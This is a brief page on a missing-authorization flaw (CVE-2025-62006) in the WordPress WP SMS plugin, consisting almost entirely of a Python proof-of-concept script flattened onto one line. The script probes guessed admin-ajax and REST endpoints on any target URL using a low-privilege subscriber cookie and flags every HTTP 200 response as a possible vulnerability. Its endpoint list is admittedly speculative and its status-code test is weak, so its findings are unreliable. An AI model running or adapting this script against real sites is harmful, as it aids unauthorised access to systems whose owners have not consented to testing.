CVE-2025-62006: WordPress WP SMS插件缺失授权漏洞

import requests import sys # CVE-2025-62006 PoC - WP SMS Broken Access Control # Target: WordPress site with WP SMS plugin <= 7.0.1 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-62006 Missing Authorization in WP SMS plugin """ # Common WP SMS endpoints that might be vulnerable vulnerable_endpoints = [ "/wp-admin/admin-ajax.php?action=wp_sms_send_sms", "/wp-admin/admin-ajax.php?action=wp_sms_subscribers", "/wp-admin/admin-ajax.php?action=wp_sms_add_subscriber", "/wp-json/wp-sms/v1/send" ] print("[*] Testing for CVE-2025-62006 - WP SMS Broken Access Control") print(f"[*] Target: {TARGET_URL}") # Test with low-privilege user session (e.g., subscriber) # In real attack scenario, attacker would have a subscriber account cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add authenticated subscriber session cookie here } for endpoint in vulnerable_endpoints: url = TARGET_URL + endpoint try: response = requests.get(url, cookies=cookies, timeout=10) # Check if request succeeds without proper authorization if response.status_code == 200: print(f"[!] Potential vulnerability found at {endpoint}") print(f" Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()